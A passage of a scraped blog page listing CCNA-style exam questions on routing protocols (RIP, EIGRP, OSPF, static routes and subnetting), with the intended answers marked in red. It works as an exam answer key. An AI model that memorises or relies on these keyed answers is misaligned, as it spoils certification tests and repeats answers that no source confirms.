&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wXJ2oSDiI/AAAAAAAAAEk/Vb7syqNfeh0/s1600-h/13.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="203" src="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wXJ2oSDiI/AAAAAAAAAEk/Vb7syqNfeh0/s400/13.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
R 192.168.1.0/24 [120/1] via 172.16.2.1, 00:00:24, Serial0/0/1&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;R 192.168.100.0/24 [120/1] via 172.16.1.1, 00:00:24, Serial0/0/0&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;S 192.168.1.0/24 [1/0] via FastEthernet0/0&lt;/b&gt;&lt;/div&gt;R 192.168.9.0/24 [120/1] via 172.16.2.1, 00:00:24, Serial0/0/0&lt;br /&gt;
R 192.168.2.0/24 [120/1] via 172.16.1.2, 00:00:24, Serial0/0/0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
14. Refer to the exhibit. The network has three connected routers: R1, R2 and R3. The routes of all three routers are displayed. What can be verified from the output?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wXb0eimsI/AAAAAAAAAEo/ywCO7sumGXI/s1600-h/14.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="261" src="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wXb0eimsI/AAAAAAAAAEo/ywCO7sumGXI/s400/14.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
R1 and R3 are connected to each other via the S0/0/0 interface.&lt;br /&gt;
The IP address of the S0/0/0 interface of R1 is 10.1.1.2.&lt;br /&gt;
The IP address of the S0/0/1 interface of R2 is 10.3.3.2.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;R2 is connected to the S0/0/1 interface of R3.&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
15. Refer to the exhibit. All router interfaces are configured with an IP address and are operational. If no routing protocols or static routes are configured, what information will be included in the show ip route command output for router A?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wXrMlUYNI/AAAAAAAAAEs/0oYsg6K4BCY/s1600-h/15.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="158" src="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wXrMlUYNI/AAAAAAAAAEs/0oYsg6K4BCY/s400/15.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
All of the 192.168.x.0 networks will be in the routing table.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;Routes to networks 192.168.1.0/24, 192.168.2.0/24, and 192.168.3.0/24 will be in the routing table.&lt;/b&gt;&lt;/div&gt;The routing table will be empty because routes and dynamic routes have not been configured.&lt;br /&gt;
A default route is automatically installed in the routing table to allow connectivity between the networks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
16. Refer to the exhibit. A network administrator is accessing router R1 from the console port. Once the administrator is connected to the router, which password should the administrator enter at the R1&amp;gt; prompt to access the privileged EXEC mode?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wYG6Dx4fI/AAAAAAAAAEw/YK364dK1lWg/s1600-h/16.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="245" src="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wYG6Dx4fI/AAAAAAAAAEw/YK364dK1lWg/s400/16.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Cisco001&lt;br /&gt;
Cisco123&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;Cisco789&lt;/b&gt;&lt;/div&gt;Cisco901&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
17. Which of the following could describe the devices labeled "?" in the graphic? (Choose three.)&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_nXUjvBK2YII/S5wYWJcCX4I/AAAAAAAAAE0/fiq5ee7Wx7Q/s1600-h/17.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="95" src="http://3.bp.blogspot.com/_nXUjvBK2YII/S5wYWJcCX4I/AAAAAAAAAE0/fiq5ee7Wx7Q/s400/17.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;DCE&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;CSU/DSU&lt;/b&gt;&lt;/div&gt;LAN switch&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;modem&lt;/b&gt;&lt;/div&gt;hub&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
18. Refer to the exhibit. Which router is advertising subnet 172.16.1.32/28?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wYs2Sa7lI/AAAAAAAAAE4/S_H8zbGIPR4/s1600-h/18.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="173" src="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wYs2Sa7lI/AAAAAAAAAE4/S_H8zbGIPR4/s400/18.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Router1&lt;br /&gt;
Router2&lt;br /&gt;
Router3&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;Router4&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
19. Refer to the exhibit. The show cdp neighbors command was run at R1. Which two facts about the newly detected device can be determined from the output? (Choose two.)&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wY9o3-09I/AAAAAAAAAE8/2lBy3byA9WM/s1600-h/19.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="77" src="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wY9o3-09I/AAAAAAAAAE8/2lBy3byA9WM/s400/19.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;ABCD is a router that is connected to R1.&lt;/b&gt;&lt;/div&gt;ABCD is a non-CISCO device that is connected to R1.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;The device is connected at the Serial0/0/1 interface of R1.&lt;/b&gt;&lt;/div&gt;R1 is connected at the S0/0/1 interface of device ABCD.&lt;br /&gt;
ABCD does not support switching capability.&lt;br /&gt;
&lt;br /&gt;
20. A static route has been configured on a router. However, the destination network no longer exists. What should an administrator do to remove the static route from the routing table?&lt;br /&gt;
Change the routing metric for that route.&lt;br /&gt;
Nothing. The static route will go away on its own.&lt;br /&gt;
Change the administrative distance for that route.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;Remove the route using the no ip route command.&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
21. Refer to the exhibit. A ping between host A and host B is successful, but pings from host A to operational hosts on the Internet fail. What is the reason for this problem?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wZSPrISGI/AAAAAAAAAFA/KmztFOaiWro/s1600-h/21.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="325" src="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wZSPrISGI/AAAAAAAAAFA/KmztFOaiWro/s400/21.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
The FastEthernet interface of R1 is disabled.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;One of the default routes is configured incorrectly.&lt;/b&gt;&lt;/div&gt;A routing protocol is not configured on both routers.&lt;br /&gt;
The default gateway has not been configured on host A.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
22. Refer to the exhibit. The network has three connected routers: R1, R2, and R3. The routes of all three routers are displayed. All routers are operational and pings are not blocked on this network.&lt;br /&gt;
&lt;br /&gt;
Which ping will fail?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wZhjgKtRI/AAAAAAAAAFE/KoCGiiweKLU/s1600-h/22.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="275" src="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wZhjgKtRI/AAAAAAAAAFE/KoCGiiweKLU/s400/22.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
from R1 to 172.16.1.1&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;from R1 to 192.168.3.1&lt;/b&gt;&lt;/div&gt;from R2 to 192.168.1.1&lt;br /&gt;
from R2 to 192.168.3.1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
23. Refer to the exhibit. What action will R2 take for a packet that is destined for 192.168.2.0?&lt;br /&gt;
It will drop the packet.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wZ7cVQT4I/AAAAAAAAAFI/sApukwJBv24/s1600-h/23.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="185" src="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wZ7cVQT4I/AAAAAAAAAFI/sApukwJBv24/s400/23.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
It will forward the packet via the S0/0/0 interface.&lt;br /&gt;
It will forward the packet via the Fa0/0 interface.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;It will forward the packet to R1&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
24. Refer to the exhibit. The users on the local network 172.16.1.0/24 complain that they are unable to connect to the Internet. What step should be taken to remedy the problem?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_nXUjvBK2YII/S5waPq9nZBI/AAAAAAAAAFM/Gq8Qlw-qzyE/s1600-h/24.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="285" src="http://4.bp.blogspot.com/_nXUjvBK2YII/S5waPq9nZBI/AAAAAAAAAFM/Gq8Qlw-qzyE/s400/24.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
A new static route must be configured on R1 with the R3 serial interface as the next hop.&lt;br /&gt;
A new default route must be configured on R1 with the R3 serial interface as the next hop.&lt;br /&gt;
The default route on R2 should be configured with the R3 serial interface as the next hop.&lt;br /&gt;
&lt;b style="color: red;"&gt;The default route on R2 must be replaced with a new static route and the next hop should be the R1&amp;nbsp;&lt;/b&gt;FastEthernet interface&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
25. Refer to the exhibit. What summary address can Router2 advertise to Router1 to reach the three networks on Routers 3, 4, and 5 without advertising any public address space or overlapping the networks on Router1?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_nXUjvBK2YII/S5waiMRpVCI/AAAAAAAAAFQ/6ft1X_pvn9w/s1600-h/25.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="177" src="http://4.bp.blogspot.com/_nXUjvBK2YII/S5waiMRpVCI/AAAAAAAAAFQ/6ft1X_pvn9w/s400/25.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
172.16.0.0/8&lt;br /&gt;
172.16.0.0/10&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;172.16.0.0/13&lt;/b&gt;&lt;/div&gt;172.16.0.0/20&lt;br /&gt;
172.16.0.0/24&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
26. Refer to the exhibit. Host A is unable to access the Internet, and troubleshooting has revealed that this is due to an addressing problem. What is incorrectly configured in this network?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wauI4J8PI/AAAAAAAAAFU/rUE15m8McHc/s1600-h/26.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="78" src="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wauI4J8PI/AAAAAAAAAFU/rUE15m8McHc/s400/26.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
the IP address of the Fa0/0 interface of R1&lt;br /&gt;
the subnet mask of the S0/0/0 interface of R1&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;the IP address of the S0/0/0 interface of R1&lt;/b&gt;&lt;/div&gt;the subnet mask of the S0/0/0 interface of R2&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wa6jpl9nI/AAAAAAAAAFY/4hvttOkcQXo/s1600-h/27.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;/a&gt;&lt;/div&gt;27. Refer to the exhibit. A new PC was deployed in the Sales network. It was given the host address of 192.168.10.31 with a default gateway of 192.168.10.17. The PC is not communicating with the network properly. What is the cause?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wa6jpl9nI/AAAAAAAAAFY/4hvttOkcQXo/s1600-h/27.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="191" src="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wa6jpl9nI/AAAAAAAAAFY/4hvttOkcQXo/s400/27.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
The default gateway is incorrect.&lt;br /&gt;
The address is in the wrong subnet.&lt;br /&gt;
The host address and default gateway are swapped.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;192.168.10.31 is the broadcast address for this subnet&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
28. Refer to the exhibit. The network administrator is planning IP addressing of a new network. What part of this addressing scheme must be changed to allow communication between host A and the server?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wbhuH_rzI/AAAAAAAAAFc/vRfqLd1KAo8/s1600-h/28.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="192" src="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wbhuH_rzI/AAAAAAAAAFc/vRfqLd1KAo8/s400/28.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;the IP address of the server&lt;/b&gt;&lt;/div&gt;the default gateway of host A&lt;br /&gt;
the IP address of host A&lt;br /&gt;
the default gateway of the server&lt;br /&gt;
&lt;br /&gt;
29. Which network design feature requires the deployment of a classless routing protocol?&lt;br /&gt;
private IP addressing&lt;br /&gt;
advertising default routes&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;variable length subnet masks&lt;/b&gt;&lt;/div&gt;summarization on major network boundaries&lt;br /&gt;
&lt;br /&gt;
30. A network administrator needs to assign the very last usable IP address in the 172.24.64.0/18 network range to the router interface that serves this LAN. Which IP address should the administrator configure on the interface?&lt;br /&gt;
172.16.128.154/18&lt;br /&gt;
172.16.255.254/18&lt;br /&gt;
172.24.64.254/18&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;172.24.127.254/18&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
31. Refer to the exhibit. All routers are running RIPv1. The two networks 10.1.1.0/29 and 10.1.1.16/29 are unable to access each other. What can be the cause of this problem?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wb2qG_crI/AAAAAAAAAFg/yJ06qKG5HT8/s1600-h/31.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="210" src="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wb2qG_crI/AAAAAAAAAFg/yJ06qKG5HT8/s400/31.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Because RIPv1 is a classless protocol, it does not support this access.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;RIPv1 does not support discontiguous networks.&lt;/b&gt;&lt;/div&gt;RIPv1 does not support load balancing.&lt;br /&gt;
RIPv1 does not support automatic summarization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
32. Refer to the exhibit. What information can be determined from the highlighted output?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wcC2BjjXI/AAAAAAAAAFk/aAhZwH574qg/s1600-h/32.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="178" src="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wcC2BjjXI/AAAAAAAAAFk/aAhZwH574qg/s400/32.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
R1 is originating the route 172.30.200.32/28.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;Automatic summarization is disabled.&lt;/b&gt;&lt;/div&gt;The 172.30.200.16/28 network is one hop away from R1.&lt;br /&gt;
A classful routing protocol is being used&lt;br /&gt;
&lt;br /&gt;
33. What does RIP use to reduce convergence time in a larger network?&lt;br /&gt;
It uses multicast instead of broadcast to send routing updates.&lt;br /&gt;
It reduces the update timer to 15 seconds if there are more than 10 routes.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;It uses triggered updates to announce network changes if they happen in between the periodic updates.&lt;/b&gt;&lt;/div&gt;It uses random pings to detect if a pathway is down and therefore is preemptive on finding networks that are down&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
34. A network administrator has enabled RIP on routers B and C in the network diagram. Which of the following commands will prevent RIP updates from being sent to Router A?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wcW4bQVuI/AAAAAAAAAFo/k00m-RlYwHg/s1600-h/34.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="205" src="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wcW4bQVuI/AAAAAAAAAFo/k00m-RlYwHg/s400/34.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
A(config)# router rip&lt;br /&gt;
A(config-router)# passive-interface S0/0&lt;br /&gt;
B(config)# router rip&lt;br /&gt;
B(config-router)# network 192.168.25.48&lt;br /&gt;
B(config-router)# network 192.168.25.64&lt;br /&gt;
A(config)# router rip&lt;br /&gt;
A(config-router)# no network 192.168.25.32&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;B(config)# router rip&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;B(config-router)# passive-interface S0/0&lt;/b&gt;&lt;/div&gt;A(config)# no router rip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
35. Refer to the exhibit. Both routers are using the RIP protocol. Devices on the 192.168.1.1 network can ping the S0/0/0 interface on R2 but cannot ping devices on the 192.168.2.1 network.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wclkI2vzI/AAAAAAAAAFs/6-1er8vIX-0/s1600-h/35.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="225" src="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wclkI2vzI/AAAAAAAAAFs/6-1er8vIX-0/s400/35.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
What is a possible cause of this problem?&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;The routers are configured with different versions of RIP.&lt;/b&gt;&lt;/div&gt;R2 is not forwarding the routing updates.&lt;br /&gt;
The R1 configuration should include the no auto-summary command.&lt;br /&gt;
The maximum path number has been exceeded.&lt;br /&gt;
&lt;br /&gt;
36. Which two statements are correct about the split horizon with poison reverse method of routing loop prevention? (Choose two.)&lt;br /&gt;
It is enabled by default on all Cisco IOS implementations.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;It assigns a value that represents an infinite metric to the poisoned route.&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;It sends back the poisoned route update to the same interface from where it was received.&lt;/b&gt;&lt;/div&gt;It instructs routers to hold all changes that might affect routes, for a specified period of time.&lt;br /&gt;
It limits the number of hops a packet can traverse through the network before it is discarded&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
37. Refer to exhibit. Given the topology shown in the exhibit, what three commands are needed to configure EIGRP on the Paris router? (Choose three.)&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_nXUjvBK2YII/S5wdA-c4i3I/AAAAAAAAAFw/jeSu9j61R7Q/s1600-h/37.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="186" src="http://3.bp.blogspot.com/_nXUjvBK2YII/S5wdA-c4i3I/AAAAAAAAAFw/jeSu9j61R7Q/s400/37.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;Paris(config)# router eigrp 100&lt;/b&gt;&lt;/div&gt;Paris(config)# router eigrp&lt;br /&gt;
Paris(config-router)# network 192.168.6.0&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;Paris(config-router)# network 192.168.7.0&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;Paris(config-router)# network 192.168.8.0&lt;/b&gt;&lt;/div&gt;Paris(config-router)# network 192.168.9.0&lt;br /&gt;
&lt;br /&gt;
38. A router has EIGRP configured as the only routing protocol. In what way might EIGRP respond if there is no feasible successor route to a destination network and the successor route fails?&lt;br /&gt;
It broadcasts hello packets to all routers in the network to re-establish neighbor adjacencies.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;It sends queries to adjacent neighbors until a new successor route is found.&lt;/b&gt;&lt;/div&gt;It immediately sends its entire routing table to its neighbors.&lt;br /&gt;
It will set the metric for the failed route to infinity.&lt;br /&gt;
&lt;br /&gt;
39. Refer to the exhibit. Hosts on the BOS Fa0/0 LAN are able to ping the Fa0/1 interface on the JAX router and all interfaces on the BOS and ORL routers. Why would hosts from the 10.0.0.0/24 network not be able to ping hosts on the Fa0/0 LAN of the JAX router?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wdTnePElI/AAAAAAAAAF0/MrQkDpwo4RI/s1600-h/39.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="198" src="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wdTnePElI/AAAAAAAAAF0/MrQkDpwo4RI/s400/39.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
The JAX router has the wrong process ID.&lt;br /&gt;
&lt;div style="color: black;"&gt;The JAX router needs the network 10.0.0.0 0.0.0.255 area 0 command.&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;The JAX router needs the network 192.168.3.0 0.0.0.255 area 0 command.&lt;/b&gt;&lt;/div&gt;The BOS router needs the network 192.168.3.0 0.0.0.255 area 0 command&lt;br /&gt;
&lt;br /&gt;
40. Which three statements describe the operation of routing with EIGRP? (Choose three.)&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;As new neighbors are discovered, entries are placed in a neighbor table.&lt;/b&gt;&lt;/div&gt;If the feasible successor has a higher advertised cost than the current successor route, then it becomes the primary route.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;If hello packets are not received within the hold time, DUAL must recalculate the topology.&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;The reported distance is the distance to a destination as advertised by a neighbor.&lt;/b&gt;&lt;/div&gt;EIGRP maintains full knowledge of the network topology in the topology table and exchanges full routing information with neighboring routers in every update.&lt;br /&gt;
EIGRP builds one routing table that contains routes for all configured routed protocols.&lt;br /&gt;
&lt;br /&gt;
41. Refer to the exhibit. What happens to a packet that has 172.16.0.0/16 as the best match in the routing table that is shown?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_nXUjvBK2YII/S5wdzueMs4I/AAAAAAAAAF4/tvULOgzDB_s/s1600-h/41.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="130" src="http://3.bp.blogspot.com/_nXUjvBK2YII/S5wdzueMs4I/AAAAAAAAAF4/tvULOgzDB_s/s400/41.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;The packet is discarded.&lt;/b&gt;&lt;/div&gt;The packet is flooded out all interfaces.&lt;br /&gt;
The packet is forwarded via Serial0/0/0.&lt;br /&gt;
The packet is forwarded via FastEthernet0/0.&lt;br /&gt;
&lt;br /&gt;
42. A network is configured with the IP, IPX, and AppleTalk protocols. Which routing protocol is recommended for this network?&lt;br /&gt;
RIPv1&lt;br /&gt;
RIPv2&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;EIGRP&lt;/b&gt;&lt;/div&gt;OSPF&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
